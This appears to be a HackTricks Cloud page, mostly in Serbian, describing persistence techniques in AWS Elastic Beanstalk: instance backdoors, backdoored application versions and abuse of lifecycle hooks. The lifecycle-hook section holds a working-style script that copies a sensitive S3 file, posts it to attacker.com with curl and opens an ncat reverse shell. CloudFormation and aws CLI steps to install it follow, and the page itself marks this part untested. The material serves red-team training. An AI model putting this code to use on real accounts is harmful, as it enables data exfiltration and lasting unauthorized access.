AWS - Elastic Beanstalk Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Elastic Beanstalk

Za više informacija pogledajte:

AWS - Elastic Beanstalk Enum

Održavanje u Instanci

Da bi se održala postojanost unutar AWS naloga, neki mehanizam postojanosti može biti uveden unutar instance (cron job, ssh ključ...) tako da napadač može da joj pristupi i ukrade IAM ulogu akreditiva iz metadata servisa.

Backdoor u Verziji

Napadač bi mogao da ubaci backdoor u kod unutar S3 repozitorijuma tako da uvek izvršava svoj backdoor i očekivani kod.

Nova verzija sa backdoor-om

Umesto da menja kod na aktuelnoj verziji, napadač bi mogao da implementira novu verziju aplikacije sa backdoor-om.

Zloupotreba Prilagođenih Resursnih Lifecycle Hooks

TODO: Test

Elastic Beanstalk pruža lifecycle hooks koji vam omogućavaju da pokrenete prilagođene skripte tokom postavljanja i gašenja instance. Napadač bi mogao da konfiguriše lifecycle hook da periodično izvršava skriptu koja exfiltrira podatke ili održava pristup AWS nalogu.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAWS - ECS Persistence NextAWS - EFS Persistence

Last updated 3 days ago